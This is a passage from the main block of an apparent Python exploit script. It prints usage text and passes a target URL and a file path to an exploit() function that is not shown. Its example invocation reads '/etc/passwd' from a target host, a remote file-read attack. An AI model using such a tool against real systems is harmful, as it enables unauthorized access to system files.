if __name__ == '__main__':
title()
if(len(sys.argv) < 3):
print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))
print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))
exit(0)
else:
exploit(sys.argv[1],sys.argv[2])